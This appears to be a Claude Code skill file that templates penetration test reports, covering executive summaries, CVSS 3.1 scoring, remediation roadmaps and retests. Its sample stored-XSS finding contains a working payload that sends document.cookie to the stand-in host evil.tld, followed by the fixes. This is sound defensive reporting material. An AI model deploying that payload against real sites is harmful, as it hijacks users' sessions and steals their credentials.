---
name: pentest-report
description: Penetration test rapor yazimi — executive summary, technical writeup, CVSS scoring, remediation roadmap advisory. Triggers on pentest report, executive summary, technical writeup, CVSS, remediation roadmap, finding writeup, retest report.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents report-generator
---

# pentest-report

Pentest report writing. The final deliverable after an engagement.

## Triggers

- "pentest rapor yaz"
- "executive summary"
- "technical writeup"
- "CVSS score hesapla"
- "remediation roadmap"
- "retest rapor"

## Report Structure

```
1. Cover Page
2. Executive Summary (1-2 pages, non-technical)
3. Scope + Methodology (1 page)
4. Risk Matrix + Summary Findings Table
5. Detailed Findings (1-2 pages per finding)
6. Remediation Roadmap
7. Appendix (tool list, sample evidence, retest plan)
```

## Executive Summary Template

```markdown
# Executive Summary

The <pentest type> test authorized by [Company Name] was conducted by
[pentest firm name] over [date range]. <X> assets were examined within the
test scope: [brief scope summary].

## Key Findings

A total of <N> findings were identified:
- **<X> Critical** — immediate action required
- **<X> High** — must be fixed within 30 days
- **<X> Medium** — 90 days
- **<X> Low** — best effort

Most serious finding: <short description of the finding>. This vulnerability
creates a risk of [business impact: customer data exposure / financial loss /
regulatory violation].

## Overall Security Posture

[Company Name]'s overall security maturity level was assessed as
<Initial/Repeatable/Defined/Managed/Optimizing>. Comparison with the previous
year's baseline: <improving / stable / degraded>.

## Strategic Recommendations

1. <Remediation for the critical finding>
2. <Process / culture recommendation: incident response drill, awareness training>
3. <Investment recommendation: SIEM coverage, universal MFA>

## Acceptance

This report was delivered as of [date]. Findings are opened for retest on
[date + 7 days].
```

## Finding Template

````markdown
## [BLG-001] Stored XSS in Comment Field — CRITICAL

### CVSS 3.1
**9.0 (Critical)** — `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N`

### Impact
Authenticated low-priv user can inject persistent JavaScript that executes
in admin browsers, leading to:
- Full admin session hijack
- Persistent malicious payload (stored as a DB record)
- 1-click via existing workflow (admin moderator panel)

### Reproduction Steps
1. Login: user@test.local / Test123! (low priv)
2. Navigate: /comments
3. Submit: `<img src=x onerror="fetch('https://evil.tld/?c='+document.cookie)">`
4. Wait: the payload fires when the admin opens the moderator review panel
5. Confirm: the cookie is delivered to the attacker's server

### Evidence
- `evidence/blg-001-payload.png` (HAR file attached)
- `evidence/blg-001-cookie-exfil.png`
- `evidence/blg-001-admin-impact.mp4` (60s video)

### Affected Component
- File: `src/components/Comment.tsx:42`
- Component: CommentRenderer.render
- Endpoint: POST /api/comments

### Root Cause
Server-side sanitization of the comment body is missing. The frontend renders
it directly via `dangerouslySetInnerHTML`.

### Recommended Fix

**Quick fix (1 day)**: Server-side sanitization
```javascript
// src/api/comments.js
import DOMPurify from 'isomorphic-dompurify';
const cleanBody = DOMPurify.sanitize(req.body.body, { ALLOWED_TAGS: ['b','i','em'] });
```

**Long-term (1 week)**:
- Content Security Policy header: `default-src 'self'; script-src 'self' 'nonce-{random}'`
- Cookie flags: HttpOnly + Secure + SameSite=Strict
- Code review checklist: approval required for any dangerouslySetInnerHTML usage

### Verification
During retest, submit the same payload -> it must be sanitized and must not execute.

### CWE / MITRE
- CWE-79: Improper Neutralization of Input (Cross-Site Scripting)
- MITRE: T1059.007 (Command and Scripting Interpreter: JavaScript)

### References
- OWASP XSS Prevention Cheatsheet
- [HackerOne similar finding](...)
````

## CVSS 3.1 Calculator (Quick)

```
ISS = 1 - ((1-C) * (1-I) * (1-A))
  C, I, A: None=0, Low=0.22, High=0.56

Impact (Scope U) = 6.42 * ISS
Impact (Scope C) = 7.52 * (ISS - 0.029) - 3.25 * (ISS - 0.02)^15

Exploitability = 8.22 * AV * AC * PR * UI
  AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2
  AC: Low=0.77, High=0.44
  PR: None=0.85, Low=0.62, High=0.27 (Scope U)
      None=0.85, Low=0.68, High=0.50 (Scope C)
  UI: None=0.85, Required=0.62

If Impact <= 0: BaseScore = 0
If Scope Unchanged:
  BaseScore = roundup(min(Impact + Exploitability, 10))
If Scope Changed:
  BaseScore = roundup(min(1.08 * (Impact + Exploitability), 10))

roundup: round up to one decimal place (8.67 -> 8.7)
```

Online: https://www.first.org/cvss/calculator/3.1

## Remediation Roadmap

```markdown
| Priority | Finding | Effort | Owner | Due | Status |
|----------|-------|--------|-------|-----|--------|
| P0 | BLG-001 Stored XSS | 8h | Frontend | 2026-05-22 | In progress |
| P0 | BLG-002 SQL Injection | 12h | Backend | 2026-05-22 | Open |
| P1 | BLG-003 Weak Cipher | 4h | DevOps | 2026-06-15 | Open |
| P2 | BLG-004 Missing HSTS | 2h | DevOps | 2026-07-30 | Open |
| P3 | BLG-005 Verbose Error | 1h | Backend | Best effort | Open |
```

## Retest Plan

- Time window: within 30 days
- Scope: only the findings identified in the original engagement
- Method: reproduce the PoC + verify the remediation
- Output: per-finding "Resolved" / "Open" / "Mitigated" + delta report

## Out-of-Scope

- Report PDF rendering (LaTeX, Word) — the template is ready, formatting is on the customer side
- Automated finding write-ups (the template exists, the content is written manually by a human)
